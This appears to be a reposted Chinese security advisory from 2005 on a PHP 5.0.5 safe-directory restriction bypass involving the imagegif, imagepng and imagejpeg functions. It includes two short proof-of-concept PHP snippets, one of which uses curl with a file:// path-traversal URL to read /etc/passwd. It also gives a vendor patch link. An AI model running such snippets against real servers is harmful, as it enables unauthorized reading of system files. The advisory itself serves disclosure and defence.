PHP Safedir限制绕过漏洞

发布日期：2005-10-18
更新日期：2005-10-18

受影响系统：

PHP PHP 5.0.5

描述：

---

BUGTRAQ ID: 15119

PHP是广泛使用的通用目的脚本语言，可嵌入到HTML，尤其适用于Web开发。

PHP的imagegif()、imagepng()和imagejpeg()函数中存在多个漏洞，允许攻击者绕过safedir目录限制，执行系统上已有的任意代码，或检索任意文件内容。

<*来源：Slythers （slythers@gmail.com）
david coallier （davidc@php.net）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=112958675914217&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
$im = imagecreatefromgif("file.gif");
imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
?>


<?php

mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch = curl_init("file://".$_SERVER
["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd ");

$file=curl_exec($ch);

echo $file;

?>

建议：

---

厂商补丁：

PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有